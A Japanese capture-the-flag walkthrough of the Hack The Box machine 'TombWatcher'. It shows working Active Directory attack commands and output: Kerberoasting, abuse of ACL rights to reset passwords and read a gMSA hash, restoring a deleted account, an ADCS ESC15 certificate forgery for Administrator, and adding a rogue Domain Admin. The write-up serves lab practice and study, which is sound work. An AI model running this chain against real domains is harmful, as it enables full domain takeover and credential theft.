目次
このマシンはassumed breach(侵害前提)のマシンであり、最初からアカウント情報が提供されています。
偵察
nmapによるスキャンを行います。
PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-24 18:24:23Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp filtered ldap no-response 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name) |_ssl-date: 2026-02-24T18:26:03+00:00; +3h59m15s from scanner time. | ssl-cert: Subject: commonName=DC01.tombwatcher.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.tombwatcher.htb | Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2024-11-16T00:47:59 | Not valid after: 2025-11-16T00:47:59 | MD5: a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666 | SHA-1: fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c | SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9 | -----BEGIN CERTIFICATE----- | MIIF9jCCBN6gAwIBAgITLgAAAAKKaXDNTUaJbgAAAAAAAjANBgkqhkiG9w0BAQUF | ADBNMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLdG9tYndh | dGNoZXIxGTAXBgNVBAMTEHRvbWJ3YXRjaGVyLUNBLTEwHhcNMjQxMTE2MDA0NzU5 | WhcNMjUxMTE2MDA0NzU5WjAfMR0wGwYDVQQDExREQzAxLnRvbWJ3YXRjaGVyLmh0 | YjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAPkYtnAM++hvs4LhMUtp | OFViax2s+4hbaS74kU86hie1/cujdlofvn6NyNppESgx99WzjmU5wthsP7JdSwNV | XHo02ygX6aC4eJ1tbPbe7jGmVlHU3XmJtZgkTAOqvt1LMym+MRNKUHgGyRlF0u68 | IQsHqBQY8KC+sS1hZ+tvbuUA0m8AApjGC+dnY9JXlvJ81QleTcd/b1EWnyxfD1YC | ezbtz1O51DLMqMysjR/nKYqG7j/R0yz2eVeX+jYa7ZODy0i1KdDVOKSHSEcjM3wf | hk1qJYZHD+2Agn4ZSfckt0X8ZYeKyIMQor/uDNbr9/YtD1WfT8ol1oXxw4gh4Ye8 | ar0CAwEAAaOCAvswggL3MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBv | AG4AdAByAG8AbABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEw | DgYDVR0PAQH/BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCA | MA4GCCqGSIb3DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCG | SAFlAwQBAjALBglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0O | BBYEFAqc8X8Ifudq/MgoPpqm0L3u15pvMB8GA1UdIwQYMBaAFCrN5HoYF07vh90L | HVZ5CkBQxvI6MIHPBgNVHR8EgccwgcQwgcGggb6ggbuGgbhsZGFwOi8vL0NOPXRv | bWJ3YXRjaGVyLUNBLTEsQ049REMwMSxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIw | U2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz10b21id2F0 | Y2hlcixEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVj | dENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHGBggrBgEFBQcBAQSBuTCBtjCB | swYIKwYBBQUHMAKGgaZsZGFwOi8vL0NOPXRvbWJ3YXRjaGVyLUNBLTEsQ049QUlB | LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp | Z3VyYXRpb24sREM9dG9tYndhdGNoZXIsREM9aHRiP2NBQ2VydGlmaWNhdGU/YmFz | ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MEAGA1UdEQQ5MDeg | HwYJKwYBBAGCNxkBoBIEEPyy7selMmxPu2rkBnNzTmGCFERDMDEudG9tYndhdGNo | ZXIuaHRiMA0GCSqGSIb3DQEBBQUAA4IBAQDHlJXOp+3AHiBFikML/iyk7hkdrrKd | gm9JLQrXvxnZ5cJHCe7EM5lk65zLB6lyCORHCjoGgm9eLDiZ7cYWipDnCZIDaJdp | Eqg4SWwTvbK+8fhzgJUKYpe1hokqIRLGYJPINNDI+tRyL74ZsDLCjjx0A4/lCIHK | UVh/6C+B68hnPsCF3DZFpO80im6G311u4izntBMGqxIhnIAVYFlR2H+HlFS+J0zo | x4qtaXNNmuaDW26OOtTf3FgylWUe5ji5MIq5UEupdOAI/xdwWV5M4gWFWZwNpSXG | Xq2engKcrfy4900Q10HektLKjyuhvSdWuyDwGW1L34ZljqsDsqV1S0SE |_-----END CERTIFICATE----- 5985/tcp filtered wsman no-response 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 55593/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
与えられているhenryのアカウント使用してbloodhoundを実行します。
henryはalfredに対してWriteSPNの権限があります。
targetKerberoastで一時的にSPNを設定し、Kerberoast攻撃を行います。
┌──(kali㉿kali)-[~/opt/targetedKerberoast] └─$ python3 targetedKerberoast.py -v -d TOMBWATCHER.HTB -u henry -p 'H3nry_987TGV!' --request-user alfred [*] Starting kerberoast attacks [*] Attacking user (alfred) [VERBOSE] SPN added successfully for (Alfred) [+] Printing hash for (Alfred) $krb5tgs$23$*Alfred$TOMBWATCHER.HTB$TOMBWATCHER.HTB/Alfred*$56fe6550716f8667d09d63f0761c47c9$642148062edecce8cc54fb874fab1eb98710da542055022f58a575432af9a4a5aefdb2014975d377ccfdc822fe8c3223b5fa86796144d45b7b00c94e3cc96424afc5ac2d9bb05364523dc61351802858c13eb712e738955b61e02a70bb665613123874873bcedd86662083ba8ca0965bdf17c9af04bf0e12d0f25767488f02e8a08e1b33d4e709ecc9a4b21477c36b17f1fd74aedb098867937e83173031342f58d33167b4f804706d2b4f860e31ae5fb931894f5299f1bedf19dca840c13822b995634a37a4cf18080fb53c4c7c66a4cc9f672bfc6082a95ebee3ca46cfc65d17576e613874dbacb46bc1feb20813ab31db0ae497a04bc684fcfaa867fd539aa3406f14534850d6aa32c81b75e2af6c1b619a3bea81d553916b581eca84392a6d4e59ac06278b6fb63318aa1d868d288f4c2e789edf020443138a08bb98fefe44535d60e3283b0ad72f0f11fd6c0a11fac6b6972095ccfb0db848ef65f4cdd18750aaa9639245114880ef7f585c52c3011c1ce2d89bd387e1e6fb2ee41373cd8977cab85d7601f175be416fa39dff75efabeb31d3634fdabd9277e16a9ca625717bfe2cac3436dd33e0c819f9fe2cce79cc67a9f5aab3ae308bc21abe7c459e124514bcb0cc2d2e686e55d5021e79756f6562ab873dfbb5d3b849640bf7d6f224c5996619a78dccf1d67df306879c9df6a36cce004cd0d6391fdb93eb6091063e11275271e58190017b384b215b080d0a11d13f90bc43759446f9228ec0347c53454677e6bee9193e178f8eb78cf79efa683a15f4abb5ea0d6a26b9db2b0588366a1bcd8744a55edc5cc51373d5f0eab2f334d599e7abbb608be8e18c2b25fe8d7d06d952ec940cd9d5c25e9be20703d0f05429873f7632713fedb00beba3f57e957063bba6aae1fa5b37a29b9c9b5e40a7c8dda735c2e62f306743c78b3921320899b9b2bfaa76111083eeef38e8033ef705aba43d7585739077c6a2abb06f39eab6b16fb667bca79c03cb94252f726cfb7d2565143e26da7bcfbf1217567bf0fde07701c4e416702badedf1c219a8e65d121452cab17ecd8c573aac86a6d1216ce0269930040e01dc812f005d9705842e4609569216915ea909957eb99ab9ce81933812a7bc229413090ed5f2bb45f0938644441d7b296a04580c560b90bd3a064f08d12b4be139fb2537e298a8b64372a1d59f8e22665355963d7ed3aefb67239b2fe00582be7c49448c82258757b43b5f474efa1e67d3c8104b1ebdceb082c1b9f4561493c800b3b194c6f00097b9633d402c316a8b9e36dd156b7376007ce80743fe70435b8f67e4205e77922dfbbe0944850b7f9f5ff6da1c62f8a3ac7c78e8e7f515347b21d0117c3d3f14dcd5c7443ab1a14e1d03a477e238317f285d5d3daf8e0669fa8e6231a706c3c5ea5a3c8de5f1be42e8a421effbbeb3a499a7795c9d0c24ee671874d0c7ba3bdd0124122b7b2e [VERBOSE] SPN removed successfully for (Alfred)
実行時に「KRB_AP_ERR_SKEW(Clock skew too great)」というようなエラーが出た場合はNTPの同期をしてから実行します。
以下はNTP同期の参考資料です。
取得したハッシュを解析するとalfred/basketballが取得できます。
alfredはINFRASTRUCTUREにAddSelfの権限があります。
bloodyADで追加します。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u alfred -p basketball --host dc01.tombwatcher.htb add groupMember Infrastructure alfred
[+] alfred added to Infrastructure
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ net rpc group members INFRASTRUCTURE -U "TOMBWATCHER.htb"/"alfred"%"basketball" -S 10.129.9.5
TOMBWATCHER\Alfred
INFRASTRUCTUREはANSIBLE_DEV$に「ReadGMSAPassword」の権限があります。
NTLMハッシュを取得します。
┌──(kali㉿kali)-[~/htb/tombwatcher] └─$ netexec ldap dc01.tombwatcher.htb -u alfred -p basketball --gmsa LDAP 10.129.9.5 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb) LDAPS 10.129.9.5 636 DC01 [+] tombwatcher.htb\alfred:basketball LDAPS 10.129.9.5 636 DC01 [*] Getting GMSA Passwords LDAPS 10.129.9.5 636 DC01 Account: ansible_dev$ NTLM: 93f81a98d22217b6206d950528a4802e PrincipalsAllowedToReadPassword: Infrastructure
ANSIBLE_DEVはSAMに対してForceChangePasswordの権限があります。
SAMのパスワードを変更します。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u 'ANSIBLE_DEV$' -p ':93f81a98d22217b6206d950528a4802e' --host dc01.tombwatcher.htb set password "sam" "qwerty12345\!"
[+] Password changed successfully!
SAMはJOHNに対してWriteOwnerの権限があります。
SAMをJOHNのOwnerに設定します。
┌──(kali㉿kali)-[~/htb/tombwatcher] └─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb set owner john sam [+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john
次にJOHNに対してGenericAllの権限を設定します。
┌──(kali㉿kali)-[~/htb/tombwatcher] └─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb add genericAll john sam [+] sam has now GenericAll on john
GenericAllを設定できたのでJOHNのパスワードを変更します。
変更後のパスワードを使用してJOHNとしてアクセスしuser.txtを取得します。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb set password john 'qwerty12345!'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ evil-winrm -i 10.129.9.5 -u john -p 'qwerty12345!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>
権限昇格
JOHNはADCSにGenericAllの権限があります。
JOHNにADCSの所有権を設定します。
┌──(kali㉿kali)-[~/htb/tombwatcher] └─$ impacket-dacledit -action write -rights FullControl -principal john -target-dn 'OU=ADCS,DC=TOMBWATCHER,DC=HTB' 'tombwatcher/john:qwerty12345!' -dc-ip 10.129.9.5 Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies [*] DACL backed up to dacledit-20260226-224452.bak [*] DACL modified successfully!
証明書のテンプレート情報を確認します。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad find -u john -p qwerty12345! -target tombwatcher.htb -dc-ip 10.129.9.5
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20260226224854_Certipy.txt'
[*] Wrote text output to '20260226224854_Certipy.txt'
[*] Saving JSON output to '20260226224854_Certipy.json'
[*] Wrote JSON output to '20260226224854_Certipy.json'
出力されたtxtの内、WebServerのテンプレートにはEnrollment Rightsが設定されています。この設定はESC15に関連します。
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
対象のSIDに対応するADオブジェクトを確認します。
*Evil-WinRM* PS C:\Users\john\Desktop> get-adobject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects" -and objectSID -like "S-1-5-21-1392491010-1358638721-2126982587-1111"' -IncludeDeletedObjects
-Properties samaccountname,displayname,objectsid
Deleted : True
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectsid : S-1-5-21-1392491010-1358638721-2126982587-1111
samaccountname : cert_admin
対象のアカウントを復元します。(復元と確認)
restore-adobject "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb" *Evil-WinRM* PS C:\Users\john\Desktop> get-aduser cert_admin DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb Enabled : True GivenName : cert_admin Name : cert_admin ObjectClass : user ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf SamAccountName : cert_admin SID : S-1-5-21-1392491010-1358638721-2126982587-1111 Surname : cert_admin UserPrincipalName :
cert_adminのパスワードを変更します。
*Evil-WinRM* PS C:\Users\john\Desktop> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123" -Force) *Evil-WinRM* PS C:\Users\john\Desktop>
証明書を取得します。
EKUがServer Authenticationの為、LDAPSHELLにアクセスします。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad req -u 'cert_admin' -p 'Password123' -dc-ip '10.129.9.5' -ca 'tombwatcher-ca-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.9.5 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.9.5:636'
[*] Authenticated to '10.129.9.5' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
#
ユーザーを追加してEvil-WinRMでアクセスします。
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.9.5 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.9.5:636'
[*] Authenticated to '10.129.9.5' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# add_user test123
Attempting to create user in: %s CN=Users,DC=tombwatcher,DC=htb
Adding new user with username: test123 and password: Ad@dKYmNBb1U=?, result: OK
# add_user_to_group test123 "Domain Admins"
Adding user: test123 to group Domain Admins result: OK
#
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ evil-winrm -i 10.129.9.5 -u test123 -p 'Ad@dKYmNBb1U=?,'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\test123\Documents>
これでroot.txtが読み取れます。
